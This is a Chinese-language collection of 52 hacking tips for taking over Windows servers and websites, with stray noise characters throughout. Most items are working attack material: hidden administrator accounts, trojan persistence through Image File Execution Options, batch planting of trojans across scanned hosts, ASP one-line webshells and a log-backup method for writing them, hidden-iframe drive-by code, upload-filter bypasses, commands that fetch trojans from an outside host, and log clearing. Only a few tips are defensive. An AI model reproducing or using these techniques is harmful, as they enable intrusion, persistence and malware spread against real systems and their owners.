1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
! Q p. h! j6 H) Kcacls C:\windows\system32 /G hqw20:R
4 W# R0 |( \ s思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入9 Y0 x: m h/ F% V4 i6 R% B
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F# u( \3 X' E- T4 M9 e
+ E6 ]' {" k7 H; ~" c
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
+ \! a7 H7 v( v! |" P2 {! S0 [1 G8 s4 A; _6 i8 y
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。$ I0 \1 e' \+ l0 g, V
, y) Y! ~) W+ N5 V. _% ^4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号+ U! t+ S/ V" O* J0 q! w
; w o$ p, T; W3 v+ L! q9 s
5、利用INF文件来修改注册表/ D! Z8 q, ?) X) f
[Version]
) H" D5 A- c7 c6 hSignature="$CHICAGO$". p8 D# q7 g+ y, z. m0 h5 `( [
[Defaultinstall]: ^( I9 U* G3 \# _/ x
addREG=Ating! x$ ?+ y1 q5 M
[Ating]$ o, T3 L& U# M! u* K( G
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
. I% a2 R0 S" b8 m3 p- `以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
4 M. y3 ]- f, V7 ]7 `5 y/ l+ _2 urundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径+ c$ z" r/ @2 ]8 D* A$ p) J
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
* n; L6 c: k/ qHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU Z, `8 Q) D/ v' K+ ]( `, d
HKEY_CURRENT_CONFIG 简写为 HKCC. [3 U) H$ b1 X
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值, s3 ?" { {* p! e
"1"这里代表是写入或删除注册表键值中的具体数据% x- X; p0 V1 ^# T y
/ b9 x6 M. y6 V9 j. K& @, s6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,; J& h4 N$ G( M# s7 s8 R
多了一步就是在防火墙里添加个端口,然后导出其键值
+ }2 i3 w6 B3 l[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]& H9 d0 ?; {$ K( i4 H" |
, S5 I! {3 `4 v2 |
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
' `4 A! Q% i) a; r' U在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
7 Z: |& f% ~$ h7 Y" G* P3 J9 H7 g" w! e O! q. {7 b3 d, s
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。/ v( C3 G# D% l6 ~- Q
M/ Q3 y0 K# b9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
3 m2 {5 z8 `8 {7 H0 h可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
3 [8 z l4 K# U7 _' e
, t& Q% P3 ?! B M! R- R10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”5 f' \! U1 T; O, J
w7 l ^2 j" g- C/ I1 Y
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,0 R$ N- i/ P5 u$ U
用法:xsniff –pass –hide –log pass.txt$ f9 L3 e, S$ z P! I. r' }) }
; s; |) _* K3 l1 v" L5 f+ }
12、google搜索的艺术5 X9 V$ G6 y. o2 A% }
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
3 e/ h* r# {. R; y+ a$ u或“字符串的语法错误”可以找到很多sql注入漏洞。3 Y( }. N" }2 L9 Q. C
, V0 o8 k0 a; P/ T
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。; K# _6 ~0 i* B6 ~1 q! n( W
7 _+ {* |) _: V# J1 K14、cmd中输入 nc –vv –l –p 19873 x$ A1 w9 J1 l
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃/ z9 M& }2 A4 v$ p7 a0 t! J
0 x- T$ L4 d! V
15、制作T++木马,先写个ating.hta文件,内容为 h) s6 b; W+ t- R9 a# j8 Q
<script language="VBScript">- k0 e3 D$ M. I5 U7 a+ V
set wshshell=createobject ("wscript.shell" )
0 k6 @: ^* y' xa=wshshell.run("你马的名称",1)
, L+ m- N. H# m6 B" L% `window.close" x/ ~2 ~8 j6 w4 Y
</script>
. L9 u ]7 g1 I& \/ y( W3 Y再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。1 s Z' @" B% g( c
+ @" J N h- @' s8 K: q
16、搜索栏里输入4 p2 t# y# a; q- {9 j: C. a6 Y; c
关键字%'and 1=1 and '%'='
' L3 V, @, c; f) W关键字%'and 1=2 and '%'='% G9 ^. l+ F4 q& v/ K" a4 z* ?
比较不同处 可以作为注入的特征字符 V3 x1 E: o% w& N- S9 u9 J5 I
- Q' b7 L d, T- D W17、挂马代码<html>7 J, U6 N/ Z/ b/ ^; |8 ?9 K; z2 w* M3 T& f
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>7 H# a# C) U+ p6 E
</html>
4 G$ S0 \# K: d1 j% z
. w. [- x& ? o7 `. Q( j18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,( z1 d+ C: j7 y5 v- E$ y
net localgroup administrators还是可以看出Guest是管理员来。" F3 y, F4 ]& U% w: }
) ~ I- F w+ O19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
4 i% I% H) N* s用法: 安装: instsrv.exe 服务名称 路径4 C# C" r7 ~# P. m7 p) u
卸载: instsrv.exe 服务名称 REMOVE; f- o! ]" S* K8 \* \" Z" M/ c2 u' l
/ m* [* x U$ @! e$ X- z# ?7 V( S8 l- _5 x$ c
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉% u! M% C% i& J' h
不能注入时要第一时间想到%5c暴库。: Z' Y; A8 P' f$ O. `/ C
. C! S4 l# U o. U3 K3 A
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
. U6 O+ E2 a, ]4 H
; b+ O+ ]: g7 d) ~23、缺少xp_cmdshell时
" g6 s* E8 J; T, b# U7 n尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'! C- k! J& Y& A |
假如恢复不成功,可以尝试直接加用户(针对开3389的)
* a$ v& }: N7 R }) Adeclare @o int
9 z; L$ R E! L9 b5 uexec sp_oacreate 'wscript.shell',@o out) `: A! Q7 u: e
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员3 e# `1 G! D5 @6 @2 G0 k
' O1 j7 E8 q+ ~9 v9 I6 I, M
24.批量种植木马.bat/ A$ i8 f- `; {+ f. c- W1 S w' i7 F
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中; X: }/ r' ?( ?) t* W
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
8 T. y S6 X! a: J, d扫描地址.txt里每个主机名一行 用\\开头* X7 Q1 f* }% C' v0 r1 v G- G
( r% v% @% O/ V$ ]4 B
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
2 l/ q& k, e+ w- z% W# U# A! B9 B+ m# x* c: }. t: `! [# u8 f
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
1 Z' ~- Z: S W, a* ^将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下." n7 n. X: n& g* _/ l; b
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
! l9 E0 @5 o) b- X$ k+ @
. S( t/ s1 a. w' `2 B27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
' t6 A( P8 d" D2 {5 b0 Y; C: m然后用#clear logg和#clear line vty *删除日志# r* \1 O) O# S t
" ^) N6 s) ^5 h
28、电脑坏了省去重新安装系统的方法0 l( H2 y0 @! A7 A3 \+ \, G( V
纯dos下执行,
+ m d/ s! U- ~6 z$ ^7 Gxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config8 Y, Q( `9 S$ L2 E/ a
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
3 g) }5 M$ p# \/ v% F8 L, ?! R: f2 F7 a( v# X3 x6 d L
29、解决TCP/IP筛选 在注册表里有三处,分别是:0 H+ [. a. j( D* L
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
2 m' l" ~- q4 h! f3 i) S( jHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
6 {3 C" Y M& I. v6 h0 Y5 F: _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
6 r" J- W6 I- I' d$ Q9 b' Z分别用
9 ?6 s! h1 A9 K% G% Q* P- b1 T. [# Pregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip# _0 r( M8 Q& K
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip" R: \+ }) Q3 F( w
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip2 r" ] q- y' B5 {) o4 p
命令来导出注册表项
' b9 x- J" h; j0 z7 f) k然后把三个文件里的EnableSecurityFilters"=dword:00000001,
1 h# q- R* W$ N R改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用. O0 x. U6 u% u$ n
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
! f* {. i6 |) Q! V& D
1 Y( t# B Z# J8 F+ U30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
; R" X: p+ H4 ~) bSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
: A1 s! M. y6 u' z/ ~) c6 o
& S) m8 w2 d* ?0 h4 q1 \* T2 W31、全手工打造开3389工具- w5 B7 s3 p1 W# V# f0 Z8 B
打开记事本,编辑内容如下:
7 M2 `" I& q( [& ~/ E! y- `echo [Components] > c:\sql
1 O" l3 I+ X! v/ D2 {echo TSEnable = on >> c:\sql; P, y+ M5 ?& a i1 J
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q3 M7 S! F2 v( t
编辑好后存为BAT文件,上传至肉鸡,执行
6 t$ G+ A+ v4 B& F
% _7 b* f. N0 Y32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
7 D7 P9 S: {" t/ l# k& L3 ^# D; A4 z& E+ a8 o
33、让服务器重启
0 \" l1 A! V7 v# o+ b0 Z写个bat死循环:7 N5 \4 y. g% `
@echo off3 t1 N% T1 A& |" E2 `. T' s
:loop1
: ?' X" w }' N j9 zcls4 B3 C- C* Q+ I+ o; O
start cmd.exe* P& V, D) @+ b. o
goto loop1 y2 n7 i' h2 X5 r4 |1 w/ l
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启' r7 x8 z: z( e3 f
1 Z3 r: y0 M" d# @7 S2 o W
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,4 J/ i$ E G) H- R7 n2 e- j
@echo off
# i' @/ T- j5 W* D$ J- ydate /t >c:/3389.txt9 A/ L1 ]0 V7 F: A& P7 z
time /t >>c:/3389.txt+ I T1 u, ^" v' K$ B$ {
attrib +s +h c:/3389.bat! |9 M, C0 L8 }" y, U. ~% n$ R
attrib +s +h c:/3389.txt
( Z# `. Y; y/ J. {netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
( X H% `" K* J9 |+ b4 p- j并保存为3389.bat
/ a' V/ { [, ~打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
6 w4 P5 g1 K# R, L. S
; ~9 E% b4 o# J6 J35、有时候提不了权限的话,试试这个命令,在命令行里输入:
% d1 A( ] l8 h8 _: U! ]start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
! r5 T V& f8 d; Z输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。6 i/ X& {$ w- c, |. ^
! J+ t) A3 y7 L% l7 R. A
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
* F. I8 N9 b# R) G" Zecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
4 |! Z& R7 h/ h1 t7 O+ S7 }echo 你的FTP账号 >>c:\1.bat //输入账号
/ l# ?/ n% D ?. {. xecho 你的FTP密码 >>c:\1.bat //输入密码( j/ u. s" t; k1 i3 t$ N
echo bin >>c:\1.bat //登入
5 k% H8 Z b7 f3 ~7 Qecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么8 I1 e# f* Z3 Q; u0 W2 g
echo bye >>c:\1.bat //退出
9 {$ h1 u7 s @. O然后执行ftp -s:c:\1.bat即可4 |: g }* Q$ p: i
. a" O- r% B+ V) `# x
37、修改注册表开3389两法7 x& B9 w" B/ G; `. k
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表1 A g; L" j4 I7 V+ a6 }
echo Windows Registry Editor Version 5.00 >>3389.reg6 N9 i1 t8 H- q% A4 E
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
6 e, c" P' i) A, p7 c' w+ p9 D- secho "Enabled"="0" >>3389.reg
1 O+ W9 ~, g- B4 f8 }echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
" X, d' F/ r) v! f' Z4 D9 w/ w* K; lNT\CurrentVersion\Winlogon] >>3389.reg) n& ~5 I, G/ Y9 m& U( X# C+ r
echo "ShutdownWithoutLogon"="0" >>3389.reg+ w$ C; ]9 M- P" o. `& C- T4 t) L5 h
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]7 Z* q0 ~" Z1 h
>>3389.reg, a! N2 X9 F- G: ]1 ~% v
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg+ @3 M9 Q/ Y( ]+ U( v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
; z: V# c' w) G: P8 a3 A) v" s5 `* I>>3389.reg& f( p7 J6 P* E& G# U A2 E
echo "TSEnabled"=dword:00000001 >>3389.reg
' z5 }' `* B7 j' I: [/ {/ x$ Y8 zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg" n$ p6 D& S, F {; ^ ^6 V
echo "Start"=dword:00000002 >>3389.reg
& `+ b6 @- P) W, Z2 Yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]( R. q- R) w }( s& _4 n. D) B
>>3389.reg
. M: ~7 ?3 D4 k. y/ p" p4 `9 ~$ U: Aecho "Start"=dword:00000002 >>3389.reg
* f) F6 A5 n; r/ }7 fecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg' M* O2 ?4 j! x/ d) F. ^& b
echo "Hotkey"="1" >>3389.reg# Z( m) N( l9 y" x! B
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 g) C w$ @6 e: n8 l5 A' |
Server\Wds\rdpwd\Tds\tcp] >>3389.reg( t2 B& u0 b2 ?% l
echo "PortNumber"=dword:00000D3D >>3389.reg
$ g i2 ?6 c9 V9 `: techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 `8 G; L2 M- Z# b* W6 L; ^
Server\WinStations\RDP-Tcp] >>3389.reg) n# G4 n1 ]2 W* Z! G
echo "PortNumber"=dword:00000D3D >>3389.reg
; }8 z9 z3 u- I j3 l把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
0 b" E7 c; N$ z( Q9 [$ `8 j+ w(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
7 \. R, @# g1 N) u8 I3 S因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效3 d2 ?* h3 q; y# b0 \5 v
(2)winxp和win2003终端开启3 N3 R* W; F/ i$ |
用以下ECHO代码写一个REG文件:
F+ S$ p3 j- m& A- r N( _2 kecho Windows Registry Editor Version 5.00>>3389.reg9 B; `5 g3 T- m- R% y4 v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 n+ D: x( q0 ~Server]>>3389.reg& x8 C4 S6 ~! J
echo "fDenyTSConnections"=dword:00000000>>3389.reg$ x g! L* h7 m' G1 `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: w f4 T5 G& u- Q/ i, a( eServer\Wds\rdpwd\Tds\tcp]>>3389.reg" L X/ [, O" ?
echo "PortNumber"=dword:00000d3d>>3389.reg
" |# ?, o2 d) v1 W: ?' secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 t7 ~" z+ B# j- E7 x9 @Server\WinStations\RDP-Tcp]>>3389.reg* X t; F2 \+ Y, ^7 T" a+ ~
echo "PortNumber"=dword:00000d3d>>3389.reg7 E& b8 N V$ W" D1 c5 N
然后regedit /s 3389.reg del 3389.reg
" e# B& G& j) |7 f' lXP下不论开终端还是改终端端口都不需重启$ o9 ?" g% U8 U N. t! m
, e% _" E$ b$ ?0 D g
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
4 {. F) g9 d0 q( P! N2 l/ r5 v3 i+ T* j用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
! P' t" y) X# e ^- h9 u+ i
& J0 M* {+ E8 m4 f3 Y! c39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
& h' I9 h5 Y& I3 V" H# e8 u6 p(1)数据库文件名应复杂并要有特殊字符( `% k9 f, h& U& ~' |
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
% D6 R1 H' l0 ?2 I将conn.asp文档中的3 |1 H' z2 \4 G! I3 C* v1 t. B
DBPath = Server.MapPath("数据库.mdb")! y+ j! } ^: N) t2 o3 b
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
8 Z6 a) I" u% M$ e; K
1 [- T9 }' N* v4 y- f修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置3 V! E* N h1 _" e# L# d: V
(3)不放在WEB目录里% z/ C9 P6 |' f& r4 y8 w) Z' B. O. E
$ J7 Q0 O# f3 t9 {7 _/ X p! e
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
. w* |; K9 J3 k( I6 U% O; U1 d: W可以写两个bat文件$ `! E/ w9 ^" M+ n8 p2 p
@echo off4 K) H" w. A. ?- a. J2 K
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe/ u$ ~2 v* i7 Q2 M, O/ N
@del c:\winnt\system32\query.exe0 ?1 N5 ^8 U. h
@del %SYSTEMROOT%\system32\dllcache\query.exe
( `1 N6 N! `. V( }4 y/ n@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的9 U8 `' O5 E9 x! A- ?# @7 c5 m8 D
" G3 B$ a ~4 ~' H2 Q
@echo off. @+ q& e: b' H2 j9 b: e. Q; ^/ X9 h* O
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe! B/ V& {) D% P4 Z7 ]
@del c:\winnt\system32\tsadmin.exe/ W3 Z9 m w( b B$ g/ M$ x
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
& m; d6 y; {0 H) X0 R; B, G( j
$ ]' Z$ u0 Q0 Q9 K: o- ^5 D41、映射对方盘符
8 O* p9 N# ?/ [telnet到他的机器上,3 b. j* i% e5 @5 o- r% u; P. z
net share 查看有没有默认共享 如果没有,那么就接着运行
* {3 P U. w; q# y3 _6 fnet share c$=c:
) ~6 w, U2 x* H! x' _net share现在有c$" ~: L) J! `4 U3 G7 K; j
在自己的机器上运行
1 D; }8 q+ j6 m5 s" b0 j0 enet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
. Q, L7 ^ f& F) q |# f1 n$ X; D9 ]* g& V3 V
42、一些很有用的老知识8 v! I, i- {$ g
type c:\boot.ini ( 查看系统版本 ). ?3 q" ~/ A+ G2 ]" x
net start (查看已经启动的服务)
8 E% l9 z% `$ ^; v; A2 P( I/ uquery user ( 查看当前终端连接 )0 q- t; p& t+ X$ v- o+ `
net user ( 查看当前用户 )$ E: L0 W9 T* @8 I3 g( ^
net user 用户 密码/add ( 建立账号 )7 l# p1 x; b5 W( L
net localgroup administrators 用户 /add (提升某用户为管理员)6 A {; ^. s f9 Y7 V& H. ]
ipconfig -all ( 查看IP什么的 )
+ j8 W0 q3 K: E0 F2 Vnetstat -an ( 查看当前网络状态 )
! A2 l) @) e, Z* {( A2 K; [/ x9 y" Nfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)# M( O0 x* w' W
克隆时Administrator对应1F4+ ~8 X9 l$ M: Y6 j% ~
guest对应1F5
% }0 C% G( S1 l' r3 Gtsinternetuser对应3E8/ D' N! B2 W% V% w8 D7 @* _9 Z
; b, y# ^3 w0 [7 }6 R8 }! M( Z
43、如果对方没开3389,但是装了Remote Administrator Service
& x8 `) \% n. V2 M q用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接( h2 e; W; [8 b8 {
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
5 q0 a9 z/ _5 N4 C$ Y' t- C1 R; F先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"- z4 S: n! S0 u3 r0 ]- C" D
" W- g; ]; Z/ H: w2 {) }9 m G44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)8 O! Q! y: ]1 q! ?8 T
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
: m& @2 }+ ?/ A: t7 H6 f' b0 x5 G
9 V+ e* |+ p/ A5 M) e45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)9 n/ I/ L2 p' S- p, s( G8 V
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open, h6 x: R* ?; Z* M3 |" u' F
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
1 j; y) \2 \" T) G; B2 KCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
) D0 T) }3 f" h9 r/ `2 q l1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs5 f% w9 i( z$ t& w6 D8 P
(这是完整的一句话,其中没有换行符)6 X$ o' c: }' v5 ]# V
然后下载:
{* ~" m o1 a' b3 Ccscript down.vbs http://www.hack520.org/hack.exe hack.exe
% D7 F3 o, U' P+ @; ~- E/ D* G4 b4 n A1 T' u2 v! X- E
46、一句话木马成功依赖于两个条件:" i$ _/ c1 t- j6 P$ W8 q$ h
1、服务端没有禁止adodb.Stream或FSO组件) @2 H- D# D, X6 o5 K8 U
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
) _+ E$ q8 o- \0 A& P; o1 S2 V
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
% u7 E2 g; w8 H1 K$ c( o;alter database utsz set RECOVERY FULL--
; d6 D$ z. R7 H5 r7 w0 X h9 M;create table cmd (a image)--& e: V+ e% t ` M; s$ M. D
;backup log utsz to disk = 'D:\cmd' with init--, c; j7 k7 ^# i( w7 J* D& q
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
6 G6 Q# x. U, ^3 V: i;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
! d7 s3 R* f3 J! U6 ^2 I注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。) z6 }$ a" r% B, t4 g! b
6 \# {" o; w7 T, y
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
* y8 J. R) j- d) @% B) q9 i9 w( m
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options8 P/ \) }' [6 o: s5 G( c. c; |' d
所有会话用 'all'。
% L9 N/ X u& v+ w-s sessionid 列出会话的信息。
6 m i9 d4 ^3 t( ^6 B; x-k sessionid 终止会话。
; G! y6 f* ~" t6 @2 m-m sessionid 发送消息到会话。+ c5 J- }, ^5 g4 X+ r# [/ A
]" [% ]1 p0 ~- yconfig 配置 telnet 服务器参数。
- E& V# h! Z8 ^2 @1 q+ T$ l/ I. J3 _, @' |! Q
common_options 为:
; x; W- i" |0 l3 b( u) |-u user 指定要使用其凭据的用户
9 b, W. E6 H& X+ L# ^8 t, v7 o-p password 用户密码& S4 T2 V" y) U* ?, J! S
) y' |( L, {: \! ^$ ^/ X, j: l
config_options 为:7 Q1 T' ~- R! O
dom = domain 设定用户的默认域, ^) ?, }; p( s
ctrlakeymap = yes|no 设定 ALT 键的映射
; F/ Q2 N! H! U9 ~5 |* ktimeout = hh:mm:ss 设定空闲会话超时值0 g1 g( _4 ?+ l$ I( [
timeoutactive = yes|no 启用空闲会话。0 D g/ v1 q$ A" d) T
maxfail = attempts 设定断开前失败的登录企图数。
4 W" r4 U: |. ]# X7 @. z) v: Lmaxconn = connections 设定最大连接数。
1 J9 e. Z9 B0 ?* q/ Q6 xport = number 设定 telnet 端口。/ Q" B2 T, I1 R0 P9 j. T
sec = [+/-]NTLM [+/-]passwd# _7 Q8 B! N6 _4 y' B* {
设定身份验证机构
+ M' f5 ?" k. i+ O$ A5 xfname = file 指定审计文件名。" N- i8 F$ c& I6 r- |
fsize = size 指定审计文件的最大尺寸(MB)。! x2 ~) @" ~2 |; m/ K
mode = console|stream 指定操作模式。
7 b E: h% Y1 S' Cauditlocation = eventlog|file|both
# O5 Q1 o. N" T: I& H指定记录地点
- w* \# t! k' q; [/ Oaudit = [+/-]user [+/-]fail [+/-]admin
$ y8 [; ~ Q+ t/ \4 w/ U( E+ Q u
49、例如:在IE上访问:8 x8 }6 q% j# C, O/ e0 w
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/! s: l! [9 \. z5 _5 ?8 |
hack.txt里面的代码是:# o2 F# ]. Z! _6 C& p: T
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
: k8 S) R) y$ G8 j# ?$ y+ {把这个hack.txt发到你空间就可以了!
7 \3 E; c& u6 |* P- ?. V这个可以利用来做网马哦!9 l) |* T, x7 S* l, h
6 v9 K8 }/ k# l; j8 O3 U50、autorun的病毒可以通过手动限制!0 L! f0 m( s& A( k8 S: ^( R
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!4 T0 g+ @; L [
2,打开盘符用右键打开!切忌双击盘符~% s( ^; r, f2 W" E9 i2 `
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!: A! ^# ~3 s! E
7 j! u8 _: B5 V
51、log备份时的一句话木马:4 }" C/ B# s9 x7 b; x- o* Z! Z) c
a).<%%25Execute(request("go"))%%25>3 |# ~1 N# s4 v$ o- J$ o! Y6 m
b).<%Execute(request("go"))%>6 M4 R' M/ X7 p4 M
c).%><%execute request("go")%><%
$ C/ `) z9 U; c" m9 Id).<script language=VBScript runat=server>execute request("sb")</Script>
) K {6 Z7 s O& w6 F$ u. ze).<%25Execute(request("l"))%25>$ [/ W# w" X5 b3 F: ?) Z& o( O
f).<%if request("cmd")<>"" then execute request("pass")%>
- I0 T- S) A( Q" K7 X9 S" q+ |* n5 _. ~- o
52、at "12:17" /interactive cmd
, j ^5 M3 J( Y9 m1 a0 A执行后可以用AT命令查看新加的任务2 M4 S6 |# X0 j* @. D
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
, L/ \- F- a5 y8 Q4 G+ ]
